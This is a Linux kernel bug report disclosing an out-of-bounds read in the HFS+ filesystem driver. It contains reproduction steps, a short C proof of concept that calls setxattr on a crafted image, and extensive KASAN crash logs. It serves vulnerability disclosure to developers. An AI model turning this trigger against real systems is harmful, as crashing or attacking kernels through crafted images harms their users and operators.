Bug 200287 - Out-of-bound access in hfsplus_bnode_copy() when calling setxattr() on a corrupted hfs+ image
Summary: Out-of-bound access in hfsplus_bnode_copy() when calling setxattr() on a corr...
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: HFS/HFSPLUS (show other bugs)
Hardware: All Linux
: P1 normal
Assignee: fs_hfs@kernel-bugs.osdl.org
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-27 03:36 UTC by Wen Xu
Modified: 2018-06-27 03:36 UTC (History)
1 user (show)

See Also:
Kernel Version: 4.18
Subsystem:
Regression: No
Bisected commit-id:

Attachments
The (compressed) crafted image which causes crash (4.00 MB, application/octet-stream)
2018-06-27 03:36 UTC, Wen Xu 		Details
Add an attachment (proposed patch, testcase, etc.)

Description Wen Xu 2018-06-27 03:36:02 UTC 
Created attachment 276889 [details]
The (compressed) crafted image which causes crash

- Reproduce (4.18)
# mkdir mnt
# mount -t hfsplus 3.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *xattr;

  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint);

  // xattr
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));
  listxattr(xattr, buf2, sizeof(buf2));
  removexattr(xattr, "user.mime_type");
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE);
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE);

}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  278.718053] hfsplus: new node 0 already hashed?
[  278.719227] WARNING: CPU: 1 PID: 1410 at fs/hfsplus/bnode.c:584 hfsplus_bnode_create+0x1f3/0x200
[  278.719233] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  278.719627] CPU: 1 PID: 1410 Comm: a.out Not tainted 4.18.0-rc1+ #6
[  278.719630] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  278.719641] RIP: 0010:hfsplus_bnode_create+0x1f3/0x200
[  278.719643] Code: 4c 89 ff e8 ef f4 ff ff 48 83 c4 08 48 c7 c0 fb ff ff ff 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 c7 c7 a0 38 96 ae e8 b1 ba bb ff <0f> 0b 4c 89 e0 eb c0 66 0f 1f 44 00 00 66 66 66 66 90 55 48 89 e5
[  278.719698] RSP: 0018:ffff8801e8db7308 EFLAGS: 00010286
[  278.719708] RAX: 0000000000000023 RBX: ffff8801e07a006c RCX: 0000000000000000
[  278.719710] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d1b6e57
[  278.719713] RBP: ffff8801e8db7338 R08: ffffed003ede4f21 R09: ffffed003ede4f21
[  278.719716] R10: 0000000000000001 R11: ffffed003ede4f20 R12: ffff8801e082db80
[  278.719718] R13: 0000000000000000 R14: ffff8801e07a0000 R15: ffff8801e07a0000
[  278.719722] FS:  00007f5a92cc6700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  278.719725] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  278.719728] CR2: 00007f5a9272e170 CR3: 00000001e5612000 CR4: 00000000000006e0
[  278.719739] Call Trace:
[  278.719753]  hfsplus_bmap_alloc+0x671/0x690
[  278.719760]  ? hfsplus_btree_write+0x1d0/0x1d0
[  278.719800]  ? remove_stable_node+0x78/0xa0
[  278.719809]  ? hfsplus_strcmp+0x97/0xe0
[  278.719816]  ? memcpy+0x45/0x50
[  278.719821]  ? hfsplus_bnode_read+0xb1/0x140
[  278.719827]  hfs_bnode_split+0xb2/0x6b0
[  278.719830]  ? memcpy+0x45/0x50
[  278.719835]  ? hfsplus_bnode_read+0xb1/0x140
[  278.719840]  ? hfs_bnode_need_zeroout+0x80/0x80
[  278.719845]  ? hfsplus_bnode_read_u16+0x6e/0xa0
[  278.719849]  ? hfsplus_bnode_read+0x140/0x140
[  278.719855]  hfsplus_brec_insert+0x1d6/0x6c0
[  278.719861]  ? hfsplus_brec_keylen+0x130/0x130
[  278.719866]  ? __kmalloc+0x11f/0x240
[  278.719872]  hfsplus_create_attr+0x263/0x2b0
[  278.719877]  ? hfsplus_attr_exists+0x140/0x140
[  278.719913]  ? strncmp+0x3d/0xc0
[  278.719919]  __hfsplus_setxattr+0x2d5/0x1160
[  278.719950]  ? unwind_get_return_address+0x36/0x50
[  278.719956]  ? kasan_check_write+0x14/0x20
[  278.719971]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  278.719978]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  278.719982]  ? save_stack+0x46/0xd0
[  278.719986]  ? kasan_kmalloc+0xad/0xe0
[  278.719990]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.719994]  ? hfsplus_setxattr+0x4c/0xb0
[  278.719998]  ? hfsplus_user_setxattr+0x27/0x30
[  278.720011]  ? __vfs_setxattr+0x7c/0xa0
[  278.720015]  ? __vfs_setxattr_noperm+0x8d/0x200
[  278.720019]  ? vfs_setxattr+0xb3/0xc0
[  278.720022]  ? setxattr+0x1b3/0x260
[  278.720026]  ? path_setxattr+0x134/0x170
[  278.720029]  ? __x64_sys_setxattr+0x6d/0x80
[  278.720042]  ? do_syscall_64+0x78/0x170
[  278.720047]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.720052]  ? save_stack+0xb5/0xd0
[  278.720055]  ? save_stack+0x46/0xd0
[  278.720058]  ? kasan_kmalloc+0xad/0xe0
[  278.720062]  ? __kmalloc_node+0x11e/0x2e0
[  278.720078]  ? kvmalloc_node+0x31/0x80
[  278.720082]  ? setxattr+0x114/0x260
[  278.720086]  ? path_setxattr+0x134/0x170
[  278.720089]  ? __x64_sys_setxattr+0x6d/0x80
[  278.720093]  ? do_syscall_64+0x78/0x170
[  278.720098]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.720102]  ? save_stack+0xb5/0xd0
[  278.720105]  ? save_stack+0x46/0xd0
[  278.720109]  ? __kasan_slab_free+0x13c/0x1a0
[  278.720112]  ? kasan_slab_free+0xe/0x10
[  278.720116]  ? kmem_cache_free+0x89/0x1e0
[  278.720125]  ? putname+0x80/0x90
[  278.720129]  ? filename_lookup+0x191/0x280
[  278.720133]  ? kasan_unpoison_shadow+0x36/0x50
[  278.720137]  ? kasan_kmalloc+0xad/0xe0
[  278.720142]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.720148]  hfsplus_setxattr+0x8a/0xb0
[  278.720152]  hfsplus_user_setxattr+0x27/0x30
[  278.720156]  __vfs_setxattr+0x7c/0xa0
[  278.720161]  __vfs_setxattr_noperm+0x8d/0x200
[  278.720165]  vfs_setxattr+0xb3/0xc0
[  278.720170]  setxattr+0x1b3/0x260
[  278.720174]  ? vfs_setxattr+0xc0/0xc0
[  278.720178]  ? filename_lookup+0x191/0x280
[  278.720182]  ? filename_parentat+0x2b0/0x2b0
[  278.720186]  ? kasan_kmalloc+0xad/0xe0
[  278.720191]  ? kasan_check_write+0x14/0x20
[  278.720213]  ? strncpy_from_user+0xa8/0x1c0
[  278.720226]  ? __mnt_is_readonly.part.13+0x23/0x30
[  278.720231]  ? __mnt_want_write+0x9d/0xb0
[  278.720236]  path_setxattr+0x134/0x170
[  278.720240]  ? setxattr+0x260/0x260
[  278.720249]  ? vm_brk+0x20/0x20
[  278.720255]  __x64_sys_setxattr+0x6d/0x80
[  278.720260]  do_syscall_64+0x78/0x170
[  278.720265]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.720285] RIP: 0033:0x7f5a927e71fa
[  278.720287] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  278.720343] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  278.720347] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa
[  278.720350] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080
[  278.720353] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000
[  278.720355] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0
[  278.720361] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000
[  278.720366] ---[ end trace 7f5a46c7478f1295 ]---
[  278.720395] hfsplus: new node 0 already hashed?
[  278.721376] WARNING: CPU: 1 PID: 1410 at fs/hfsplus/bnode.c:584 hfsplus_bnode_create+0x1f3/0x200
[  278.721377] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  278.721441] CPU: 1 PID: 1410 Comm: a.out Tainted: G        W         4.18.0-rc1+ #6
[  278.721444] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  278.721449] RIP: 0010:hfsplus_bnode_create+0x1f3/0x200
[  278.721450] Code: 4c 89 ff e8 ef f4 ff ff 48 83 c4 08 48 c7 c0 fb ff ff ff 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 c7 c7 a0 38 96 ae e8 b1 ba bb ff <0f> 0b 4c 89 e0 eb c0 66 0f 1f 44 00 00 66 66 66 66 90 55 48 89 e5
[  278.721505] RSP: 0018:ffff8801e8db7318 EFLAGS: 00010282
[  278.721509] RAX: 0000000000000023 RBX: ffff8801e07a006c RCX: 0000000000000000
[  278.721511] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d1b6e59
[  278.721514] RBP: ffff8801e8db7348 R08: ffffed003ede3ebb R09: ffffed003ede3ebb
[  278.721517] R10: 0000000000000001 R11: ffffed003ede3eba R12: ffff8801e082db80
[  278.721519] R13: 0000000000000000 R14: ffff8801e07a0000 R15: ffff8801e07a0000
[  278.721523] FS:  00007f5a92cc6700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  278.721525] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  278.721528] CR2: 00007f5a9272e170 CR3: 00000001e5612000 CR4: 00000000000006e0
[  278.721532] Call Trace:
[  278.721540]  hfsplus_bmap_alloc+0x671/0x690
[  278.721545]  ? hfsplus_btree_write+0x1d0/0x1d0
[  278.721550]  ? hfsplus_bnode_put+0x190/0x190
[  278.721554]  ? memcpy+0x45/0x50
[  278.721559]  ? hfsplus_bnode_read+0xb1/0x140
[  278.721565]  hfs_btree_inc_height+0xd3/0x450
[  278.721569]  ? hfs_brec_update_parent+0xa6/0x560
[  278.721574]  ? hfs_bnode_split+0x6b0/0x6b0
[  278.721588]  ? mark_page_accessed+0x133/0x200
[  278.721594]  ? hfsplus_bnode_put+0xb8/0x190
[  278.721599]  hfsplus_brec_insert+0x5a5/0x6c0
[  278.721605]  ? hfsplus_brec_keylen+0x130/0x130
[  278.721609]  ? __kmalloc+0x11f/0x240
[  278.721615]  hfsplus_create_attr+0x263/0x2b0
[  278.721621]  ? hfsplus_attr_exists+0x140/0x140
[  278.721626]  ? strncmp+0x3d/0xc0
[  278.721632]  __hfsplus_setxattr+0x2d5/0x1160
[  278.721637]  ? unwind_get_return_address+0x36/0x50
[  278.721642]  ? kasan_check_write+0x14/0x20
[  278.721647]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  278.721653]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  278.721657]  ? save_stack+0x46/0xd0
[  278.721661]  ? kasan_kmalloc+0xad/0xe0
[  278.721665]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.721669]  ? hfsplus_setxattr+0x4c/0xb0
[  278.721673]  ? hfsplus_user_setxattr+0x27/0x30
[  278.721677]  ? __vfs_setxattr+0x7c/0xa0
[  278.721680]  ? __vfs_setxattr_noperm+0x8d/0x200
[  278.721684]  ? vfs_setxattr+0xb3/0xc0
[  278.721687]  ? setxattr+0x1b3/0x260
[  278.721691]  ? path_setxattr+0x134/0x170
[  278.721694]  ? __x64_sys_setxattr+0x6d/0x80
[  278.721698]  ? do_syscall_64+0x78/0x170
[  278.721703]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.721708]  ? save_stack+0xb5/0xd0
[  278.721711]  ? save_stack+0x46/0xd0
[  278.721714]  ? kasan_kmalloc+0xad/0xe0
[  278.721718]  ? __kmalloc_node+0x11e/0x2e0
[  278.721723]  ? kvmalloc_node+0x31/0x80
[  278.721726]  ? setxattr+0x114/0x260
[  278.721730]  ? path_setxattr+0x134/0x170
[  278.721733]  ? __x64_sys_setxattr+0x6d/0x80
[  278.721737]  ? do_syscall_64+0x78/0x170
[  278.721746]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.721751]  ? save_stack+0xb5/0xd0
[  278.721776]  ? save_stack+0x46/0xd0
[  278.721780]  ? __kasan_slab_free+0x13c/0x1a0
[  278.721783]  ? kasan_slab_free+0xe/0x10
[  278.721787]  ? kmem_cache_free+0x89/0x1e0
[  278.721790]  ? putname+0x80/0x90
[  278.721794]  ? filename_lookup+0x191/0x280
[  278.721798]  ? kasan_unpoison_shadow+0x36/0x50
[  278.721802]  ? kasan_kmalloc+0xad/0xe0
[  278.721807]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.721812]  hfsplus_setxattr+0x8a/0xb0
[  278.721817]  hfsplus_user_setxattr+0x27/0x30
[  278.721821]  __vfs_setxattr+0x7c/0xa0
[  278.721825]  __vfs_setxattr_noperm+0x8d/0x200
[  278.721830]  vfs_setxattr+0xb3/0xc0
[  278.721834]  setxattr+0x1b3/0x260
[  278.721838]  ? vfs_setxattr+0xc0/0xc0
[  278.721842]  ? filename_lookup+0x191/0x280
[  278.721846]  ? filename_parentat+0x2b0/0x2b0
[  278.721850]  ? kasan_kmalloc+0xad/0xe0
[  278.721855]  ? kasan_check_write+0x14/0x20
[  278.721860]  ? strncpy_from_user+0xa8/0x1c0
[  278.721865]  ? __mnt_is_readonly.part.13+0x23/0x30
[  278.721870]  ? __mnt_want_write+0x9d/0xb0
[  278.721874]  path_setxattr+0x134/0x170
[  278.721878]  ? setxattr+0x260/0x260
[  278.721882]  ? vm_brk+0x20/0x20
[  278.721887]  __x64_sys_setxattr+0x6d/0x80
[  278.721897]  do_syscall_64+0x78/0x170
[  278.721903]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.721906] RIP: 0033:0x7f5a927e71fa
[  278.721907] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  278.721962] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  278.721966] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa
[  278.721969] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080
[  278.721972] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000
[  278.721974] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0
[  278.721976] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000
[  278.721980] ---[ end trace 7f5a46c7478f1296 ]---
[  278.725358] ==================================================================
[  278.726920] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_copy+0x2a8/0x360
[  278.728353] Read of size 8 at addr ffff8801e082db60 by task a.out/1410

[  278.730053] CPU: 1 PID: 1410 Comm: a.out Tainted: G        W         4.18.0-rc1+ #6
[  278.730056] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  278.730058] Call Trace:
[  278.730066]  dump_stack+0x7b/0xb5
[  278.730071]  print_address_description+0x70/0x290
[  278.730075]  kasan_report+0x291/0x390
[  278.730080]  ? hfsplus_bnode_copy+0x2a8/0x360
[  278.730090]  __asan_load8+0x54/0x90
[  278.730094]  hfsplus_bnode_copy+0x2a8/0x360
[  278.730099]  ? hfsplus_bnode_write+0xc2/0x170
[  278.730104]  hfs_btree_inc_height+0x2b5/0x450
[  278.730110]  ? hfs_bnode_split+0x6b0/0x6b0
[  278.730118]  ? mark_page_accessed+0x133/0x200
[  278.730124]  ? hfsplus_bnode_put+0xb8/0x190
[  278.730129]  hfsplus_brec_insert+0x5a5/0x6c0
[  278.730135]  ? hfsplus_brec_keylen+0x130/0x130
[  278.730139]  ? __kmalloc+0x11f/0x240
[  278.730146]  hfsplus_create_attr+0x263/0x2b0
[  278.730155]  ? hfsplus_attr_exists+0x140/0x140
[  278.730160]  ? strncmp+0x3d/0xc0
[  278.730165]  __hfsplus_setxattr+0x2d5/0x1160
[  278.730171]  ? unwind_get_return_address+0x36/0x50
[  278.730177]  ? kasan_check_write+0x14/0x20
[  278.730185]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  278.730191]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  278.730195]  ? save_stack+0x46/0xd0
[  278.730198]  ? kasan_kmalloc+0xad/0xe0
[  278.730202]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.730207]  ? hfsplus_setxattr+0x4c/0xb0
[  278.730211]  ? hfsplus_user_setxattr+0x27/0x30
[  278.730217]  ? __vfs_setxattr+0x7c/0xa0
[  278.730227]  ? __vfs_setxattr_noperm+0x8d/0x200
[  278.730235]  ? vfs_setxattr+0xb3/0xc0
[  278.730239]  ? setxattr+0x1b3/0x260
[  278.730242]  ? path_setxattr+0x134/0x170
[  278.730246]  ? __x64_sys_setxattr+0x6d/0x80
[  278.730250]  ? do_syscall_64+0x78/0x170
[  278.730255]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.730260]  ? save_stack+0xb5/0xd0
[  278.730264]  ? save_stack+0x46/0xd0
[  278.730267]  ? kasan_kmalloc+0xad/0xe0
[  278.730271]  ? __kmalloc_node+0x11e/0x2e0
[  278.730275]  ? kvmalloc_node+0x31/0x80
[  278.730280]  ? setxattr+0x114/0x260
[  278.730285]  ? path_setxattr+0x134/0x170
[  278.730290]  ? __x64_sys_setxattr+0x6d/0x80
[  278.730298]  ? do_syscall_64+0x78/0x170
[  278.730302]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.730306]  ? save_stack+0xb5/0xd0
[  278.730309]  ? save_stack+0x46/0xd0
[  278.730312]  ? __kasan_slab_free+0x13c/0x1a0
[  278.730316]  ? kasan_slab_free+0xe/0x10
[  278.730320]  ? kmem_cache_free+0x89/0x1e0
[  278.730324]  ? putname+0x80/0x90
[  278.730329]  ? filename_lookup+0x191/0x280
[  278.730334]  ? kasan_unpoison_shadow+0x36/0x50
[  278.730341]  ? kasan_kmalloc+0xad/0xe0
[  278.730346]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.730352]  hfsplus_setxattr+0x8a/0xb0
[  278.730356]  hfsplus_user_setxattr+0x27/0x30
[  278.730361]  __vfs_setxattr+0x7c/0xa0
[  278.730369]  __vfs_setxattr_noperm+0x8d/0x200
[  278.730374]  vfs_setxattr+0xb3/0xc0
[  278.730378]  setxattr+0x1b3/0x260
[  278.730382]  ? vfs_setxattr+0xc0/0xc0
[  278.730387]  ? filename_lookup+0x191/0x280
[  278.730391]  ? filename_parentat+0x2b0/0x2b0
[  278.730398]  ? kasan_kmalloc+0xad/0xe0
[  278.730403]  ? kasan_check_write+0x14/0x20
[  278.730408]  ? strncpy_from_user+0xa8/0x1c0
[  278.730413]  ? __mnt_is_readonly.part.13+0x23/0x30
[  278.730419]  ? __mnt_want_write+0x9d/0xb0
[  278.730426]  path_setxattr+0x134/0x170
[  278.730430]  ? setxattr+0x260/0x260
[  278.730434]  ? vm_brk+0x20/0x20
[  278.730438]  __x64_sys_setxattr+0x6d/0x80
[  278.730443]  do_syscall_64+0x78/0x170
[  278.730448]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.730453] RIP: 0033:0x7f5a927e71fa
[  278.730455] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  278.730525] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  278.730529] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa
[  278.730532] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080
[  278.730534] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000
[  278.730538] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0
[  278.730542] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000

[  278.730894] Allocated by task 1410:
[  278.731642]  save_stack+0x46/0xd0
[  278.731647]  kasan_kmalloc+0xad/0xe0
[  278.731651]  __kmalloc+0x11f/0x240
[  278.731657]  __hfs_bnode_create+0xc6/0x3f0
[  278.731665]  hfsplus_bnode_find+0x1f0/0x500
[  278.731669]  hfsplus_brec_find+0x1c1/0x2e0
[  278.731673]  hfsplus_find_attr+0xb2/0xd0
[  278.731676]  hfsplus_listxattr+0x273/0x6e0
[  278.731679]  vfs_listxattr+0x9d/0xc0
[  278.731684]  listxattr+0x58/0xd0
[  278.731689]  path_listxattr+0xb9/0x120
[  278.731692]  __x64_sys_listxattr+0x48/0x50
[  278.731700]  do_syscall_64+0x78/0x170
[  278.731705]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  278.732051] Freed by task 0:
[  278.732676] (stack is not available)

[  278.733779] The buggy address belongs to the object at ffff8801e082db00
                which belongs to the cache kmalloc-96 of size 96
[  278.736283] The buggy address is located 0 bytes to the right of
                96-byte region [ffff8801e082db00, ffff8801e082db60)
[  278.738721] The buggy address belongs to the page:
[  278.739721] page:ffffea0007820b40 count:1 mapcount:0 mapping:ffff8801f6803500 index:0x0
[  278.741355] flags: 0x2ffff0000000100(slab)
[  278.742229] raw: 02ffff0000000100 dead000000000100 dead000000000200 ffff8801f6803500
[  278.743776] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[  278.745321] page dumped because: kasan: bad access detected

[  278.746786] Memory state around the buggy address:
[  278.747765]  ffff8801e082da00: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc
[  278.749249]  ffff8801e082da80: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc
[  278.750731] >ffff8801e082db00: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc
[  278.752197]                                                        ^
[  278.753497]  ffff8801e082db80: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc
[  278.754982]  ffff8801e082dc00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  278.756448] ==================================================================
[  278.799025] Disabling lock debugging due to kernel taint
[  278.800160] general protection fault: 0000 [#1] SMP KASAN PTI
[  278.801417] CPU: 0 PID: 1410 Comm: a.out Tainted: G    B   W         4.18.0-rc1+ #6
[  278.803004] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  278.804953] RIP: 0010:__memcpy+0x12/0x20
[  278.805773] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  278.809613] RSP: 0018:ffff8801e8db7430 EFLAGS: 00010246
[  278.810705] RAX: a805570000016000 RBX: 0000000000001000 RCX: 0000000000000200
[  278.812157] RDX: 0000000000000000 RSI: 700556c000016000 RDI: a805570000016000
[  278.813606] RBP: ffff8801e8db7450 R08: ffffed003e09c499 R09: ffffed003e09c499
[  278.815062] R10: 0000000000000001 R11: ffffed003e09c498 R12: a805570000016000
[  278.816505] R13: 700556c000016000 R14: ffff8801e082db60 R15: 0000000000001000
[  278.817960] FS:  00007f5a92cc6700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  278.819599] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  278.820770] CR2: 00007f828de0901a CR3: 00000001e5612000 CR4: 00000000000006f0
[  278.822230] Call Trace:
[  278.822757]  ? memcpy+0x45/0x50
[  278.823422]  hfsplus_bnode_copy+0x333/0x360
[  278.824287]  ? hfsplus_bnode_write+0xc2/0x170
[  278.825187]  hfs_btree_inc_height+0x2b5/0x450
[  278.826102]  ? hfs_bnode_split+0x6b0/0x6b0
[  278.826954]  ? mark_page_accessed+0x133/0x200
[  278.827856]  ? hfsplus_bnode_put+0xb8/0x190
[  278.828722]  hfsplus_brec_insert+0x5a5/0x6c0
[  278.829607]  ? hfsplus_brec_keylen+0x130/0x130
[  278.830539]  ? __kmalloc+0x11f/0x240
[  278.831283]  hfsplus_create_attr+0x263/0x2b0
[  278.832167]  ? hfsplus_attr_exists+0x140/0x140
[  278.833085]  ? strncmp+0x3d/0xc0
[  278.833771]  __hfsplus_setxattr+0x2d5/0x1160
[  278.834664]  ? unwind_get_return_address+0x36/0x50
[  278.835654]  ? kasan_check_write+0x14/0x20
[  278.836508]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  278.837443]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  278.838647]  ? save_stack+0x46/0xd0
[  278.839372]  ? kasan_kmalloc+0xad/0xe0
[  278.840149]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.841115]  ? hfsplus_setxattr+0x4c/0xb0
[  278.841956]  ? hfsplus_user_setxattr+0x27/0x30
[  278.842869]  ? __vfs_setxattr+0x7c/0xa0
[  278.843658]  ? __vfs_setxattr_noperm+0x8d/0x200
[  278.844589]  ? vfs_setxattr+0xb3/0xc0
[  278.845347]  ? setxattr+0x1b3/0x260
[  278.846083]  ? path_setxattr+0x134/0x170
[  278.846895]  ? __x64_sys_setxattr+0x6d/0x80
[  278.847760]  ? do_syscall_64+0x78/0x170
[  278.848557]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.849629]  ? save_stack+0xb5/0xd0
[  278.850364]  ? save_stack+0x46/0xd0
[  278.851088]  ? kasan_kmalloc+0xad/0xe0
[  278.851862]  ? __kmalloc_node+0x11e/0x2e0
[  278.852690]  ? kvmalloc_node+0x31/0x80
[  278.853466]  ? setxattr+0x114/0x260
[  278.854206]  ? path_setxattr+0x134/0x170
[  278.855034]  ? __x64_sys_setxattr+0x6d/0x80
[  278.855898]  ? do_syscall_64+0x78/0x170
[  278.856694]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.857771]  ? save_stack+0xb5/0xd0
[  278.858501]  ? save_stack+0x46/0xd0
[  278.859226]  ? __kasan_slab_free+0x13c/0x1a0
[  278.860106]  ? kasan_slab_free+0xe/0x10
[  278.860901]  ? kmem_cache_free+0x89/0x1e0
[  278.861731]  ? putname+0x80/0x90
[  278.862421]  ? filename_lookup+0x191/0x280
[  278.863268]  ? kasan_unpoison_shadow+0x36/0x50
[  278.864181]  ? kasan_kmalloc+0xad/0xe0
[  278.864960]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.865940]  hfsplus_setxattr+0x8a/0xb0
[  278.866734]  hfsplus_user_setxattr+0x27/0x30
[  278.867616]  __vfs_setxattr+0x7c/0xa0
[  278.868378]  __vfs_setxattr_noperm+0x8d/0x200
[  278.869275]  vfs_setxattr+0xb3/0xc0
[  278.870013]  setxattr+0x1b3/0x260
[  278.870706]  ? vfs_setxattr+0xc0/0xc0
[  278.871465]  ? filename_lookup+0x191/0x280
[  278.872307]  ? filename_parentat+0x2b0/0x2b0
